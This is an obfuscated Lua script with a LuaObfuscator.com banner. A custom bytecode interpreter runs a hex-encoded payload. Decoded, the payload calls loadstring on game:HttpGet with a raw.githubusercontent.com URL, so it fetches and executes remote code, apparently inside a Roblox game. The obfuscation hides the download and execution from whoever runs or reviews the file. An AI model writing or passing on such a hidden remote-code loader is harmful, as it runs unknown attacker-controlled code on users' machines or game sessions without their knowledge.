--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v119=v5(v87,v19);v19=nil;return v119;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((570 -(367 + (1471 -(226 + 1044))))^(v32-(2 -1))))%(((21 -16) -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (878 -(282 + 595)))) ;return v88-(v88%(2 -1)) ;else local v89=(2 + 0)^(v32-1) ;return (((v31%(v89 + v89))>=v89) and (620 -((672 -(32 + 85)) + 64))) or (931 -(857 + 74)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v40 * 16777216) + (v39 * (121138 -55602)) + (v38 * ((819 -(87 + 263)) -213)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1 + 0 ,49 -29 ) * (2^((1170 -(116 + 1022)) + 0))) + v41 ;local v45=v20(v42,16 + 5 ,123 -92 );local v46=((v20(v42,984 -((3338 -2536) + 150) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;if (v45==(997 -(915 + 82))) then if (v44==((0 + 0) -(0 -0))) then return v46 * (0 -0) ;else v45=1 + (0 -0) ;v43=0 -0 ;end elseif (v45==(1193 + (1713 -(814 + 45)))) then return ((v44==((0 -0) -0)) and (v46 * ((1487 -(998 + 488))/(1187 -(1069 + 118))))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((2 + 0)^((7 + 110) -65)))) ;end local function v25(v47) local v48=0 + 0 ;local v49;local v50;while true do if (v48==(885 -(261 + 624))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=1081 -(1020 + 60) ;end if (v48==(1426 -(630 + 793))) then return v6(v50);end if (v48==(6 -(13 -9))) then v50={};for v107=4 -3 , #v49 do v50[v107]=v2(v1(v3(v49,v107,v107)));end v48=3;end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;v48=1749 -(760 + 987) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97,v98) local v99=(function() return 380 -(339 + 41) ;end)();local v90=(function() return;end)();local v91=(function() return;end)();while true do if (v99~=(0 + 0)) then else local v115=(function() return 0 + 0 ;end)();while true do if (v115==(397 -(115 + 281))) then v99=(function() return 1;end)();break;end if (v115~=0) then else v90=(function() return 0 -0 ;end)();v91=(function() return nil;end)();v115=(function() return 1;end)();end end end if ((1 + 0)==v99) then local v116=(function() return 0 -0 ;end)();while true do if (0==v116) then local v120=(function() return 0 -0 ;end)();while true do if (v120==0) then while true do if (0==v90) then v91=(function() return v92();end)();if (v93(v91, #"!", #"|")~=(867 -(550 + 317))) then else local v156=(function() return 0 -0 ;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();while true do if (v156==1) then local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==(0 -0)) then v173=(function() return 0 -0 ;end)();while true do if (v173==0) then v159=(function() return {v94(),v94(),nil,nil};end)();if (v157==0) then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 1665 -(970 + 695) ;end)();while true do if (0==v183) then v159[ #"91("]=(function() return v94();end)();v159[ #"0313"]=(function() return v94();end)();break;end end break;end end elseif (v157== #"]") then v159[ #"xnx"]=(function() return v95();end)();elseif (v157==(3 -1)) then v159[ #"xxx"]=(function() return v95() -(2^16) ;end)();elseif (v157~= #"91(") then else local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188~=0) then else v189=(function() return 0;end)();while true do if (v189==(1990 -(582 + 1408))) then v159[ #"-19"]=(function() return v95() -((6 -4)^16) ;end)();v159[ #"http"]=(function() return v94();end)();break;end end break;end end end v173=(function() return 1;end)();end if (v173==(1 -0)) then v156=(function() return 7 -5 ;end)();break;end end break;end end end if (3~=v156) then else if (v93(v158, #"xnx", #"nil")== #"]") then v159[ #"asd1"]=(function() return v96[v159[ #"0836"]];end)();end v97[v98]=(function() return v159;end)();break;end if (v156==(1824 -(1195 + 629))) then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if ((241 -(187 + 54))~=v175) then else v176=(function() return 780 -(162 + 618) ;end)();while true do if (v176==0) then v157=(function() return v93(v91,2, #"-19");end)();v158=(function() return v93(v91, #".com",5 + 1 );end)();v176=(function() return 1 + 0 ;end)();end if (v176==(1 -0)) then v156=(function() return 1 -0 ;end)();break;end end break;end end end if (v156~=2) then else if (v93(v158, #"[", #"<")== #"|") then v159[2]=(function() return v96[v159[2]];end)();end if (v93(v158,2,1 + 1 )~= #" ") then else v159[ #"gha"]=(function() return v96[v159[ #"nil"]];end)();end v156=(function() return 1639 -(1373 + 263) ;end)();end end end break;end end return v90,v91,v92,v93,v94,v95,v96,v97,v98;end end end end end end end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();local v104=(function() return;end)();while true do if (v103==0) then v104=(function() return 1000 -(451 + 549) ;end)();while true do if (v104==0) then local v121=(function() return 0;end)();while true do if (v121==0) then v100[v101-#"{" ]=(function() return v102();end)();return v100,v101,v102;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #">",v57 do local v67=(function() return 0 -0 ;end)();local v68=(function() return;end)();local v69=(function() return;end)();while true do if (v67==0) then local v109=(function() return 0;end)();while true do if (v109==1) then v67=(function() return 1;end)();break;end if (v109==(0 -0)) then v68=(function() return v21();end)();v69=(function() return nil;end)();v109=(function() return 1;end)();end end end if (v67==(1385 -(746 + 638))) then if (v68== #"~") then v69=(function() return v21()~=(0 + 0) ;end)();elseif (v68==(2 -0)) then v69=(function() return v24();end)();elseif (v68~= #"xxx") then else v69=(function() return v25();end)();end v58[v66]=(function() return v69;end)();break;end end end v56[ #"nil"]=(function() return v21();end)();for v70= #"[",v23() do FlatIdent_E652,Descriptor,v21,v20,v22,v23,v58,v53,v70=(function() return v51(FlatIdent_E652,Descriptor,v21,v20,v22,v23,v58,v53,v70);end)();end for v71= #"~",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[5 -3 ];local v65=v60[169 -(122 + 44) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=(2317 -(1913 + 62)) -(218 + 123) ;local v77= -(1582 -(1535 + 46));local v78={};local v79={...};local v80=v12("#",...) -(1 + (238 -(64 + 174))) ;local v81={};local v82={};for v105=0 + 0 ,v80 do if (v105>=v74) then v78[v105-v74 ]=v79[v105 + ((42 + 24) -(30 + 35)) ];else v82[v105]=v79[v105 + 1 ];end end local v83=(v80-v74) + (561 -(306 + 254)) ;local v84;local v85;while true do local v106=0 + 0 ;while true do if ((3287<4046) and (v106==((180 + 1077) -((2760 -1717) + (2147 -(565 + 1368)))))) then v84=v72[v76];v85=v84[1 -0 ];v106=(5520 -4052) -((1330 -431) + 568) ;end if (v106==1) then if (v85<=7) then if ((v85<=(11 -8)) or (2318==4700)) then if (v85<=(1 + 0)) then if (v85==(0 -0)) then local v123=v84[605 -(268 + 335) ];local v124,v125=v75(v82[v123](v13(v82,v123 + (291 -(60 + 230)) ,v84[575 -((579 -153) + (482 -(144 + 192))) ])));v77=(v125 + v123) -(1 + 0) ;local v126=1456 -(282 + 1094 + 80) ;for v154=v123,v77 do local v155=811 -(569 + 242) ;while true do if (v155==(0 -(216 -(42 + 174)))) then v126=v126 + 1 + 0 ;v82[v154]=v124[v126];break;end end end else local v127=v84[2 + 0 + 0 ];local v128=v82[v84[2 + 1 ]];v82[v127 + 1 ]=v128;v82[v127]=v128[v84[1028 -(706 + 318) ]];end elseif ((v85>(1253 -(721 + 530))) or (142==1447)) then local v132=1271 -(945 + 326) ;local v133;while true do if (v132==(0 -0)) then v133=v84[1 + 1 ];v82[v133]=v82[v133](v13(v82,v133 + 1 + 0 ,v77));break;end end else v82[v84[3 -1 ]]();end elseif (v85<=(705 -(225 + 46 + 429))) then if ((4134>=3357) and ((v85==(2 + 1 + 1)) or (647==4687))) then do return;end else local v134=0 + 0 ;local v135;local v136;while true do if ((v134==(1501 -(1408 + 92))) or (3417<2534)) then v82[v135 + (1087 -(461 + 625)) ]=v136;v82[v135]=v136[v84[1292 -(993 + 295) ]];break;end if (v134==(0 + 0)) then v135=v84[1173 -(418 + 753) ];v136=v82[v84[(1515 -(363 + 1141)) -8 ]];v134=1;end end end elseif ((v85>(3 + 3)) or (2722<=164)) then v82[v84[1123 -(118 + 1003) ]]=v84[1 + 2 ];else v82[v84[5 -3 ]]={};end elseif (v85<=((1968 -(1183 + 397)) -((244 -102) + (708 -473)))) then if (v85<=(3 + 6)) then if ((v85==(2 + 6)) or (2408<2109)) then v82[v84[979 -(553 + 424) ]]=v62[v84[1 + 2 ]];else v82[v84[531 -((1235 -829) + 123) ]]();end elseif ((943<=4776) and (v85==((2083 -(244 + 60)) -(1749 + 15 + 5)))) then v82[v84[1 + 0 + 1 ]]=v84[3];else do return;end end elseif (v85<=((1027 + 308) -(1249 + 73))) then if (v85>(7 + 5)) then local v144=0 + 0 ;local v145;local v146;local v147;local v148;while true do if ((v144==(1146 -((942 -(41 + 435)) + (1680 -(938 + 63))))) or (33==1455)) then v77=(v147 + v145) -(2 -1) ;v148=(0 + 0) -0 ;v144=5 -3 ;end if (((1902 -(106 + 1794))==v144) or (443>=4015)) then for v170=v145,v77 do local v171=0 + 0 ;while true do if ((3382>166) and (v171==(753 -(239 + 514)))) then v148=v148 + 1 + 0 ;v82[v170]=v146[v148];break;end end end break;end if (v144==0) then v145=v84[1331 -(797 + 532) ];v146,v147=v75(v82[v145](v13(v82,v145 + (2 -1) ,v84[2 + 1 ])));v144=(1127 -(936 + 189)) -1 ;end end else v82[v84[(39 + 77) -(4 + 110) ]]=v62[v84[587 -(57 + 527) ]];end elseif (v85==(1441 -(41 + 1386))) then local v151=v84[(2745 -(1565 + 48)) -(369 + 471 + 290) ];v82[v151]=v82[v151](v13(v82,v151 + (104 -(17 + 86)) ,v77));else v82[v84[2 + 0 ]]={};end v76=v76 + (1 -(1138 -(782 + 356))) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403623Q00682Q7470733A2Q2F682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F704164736173643371322F44613938313233343132647378662F726566732F68656164732F6D61696E2F323334323432642Q736B6C67736700094Q00067Q00120C000100013Q00120C000200023Q002001000200020003001207000400044Q000D000200044Q000E00013Q00022Q00090001000100012Q000B3Q00017Q00",v9(),...);
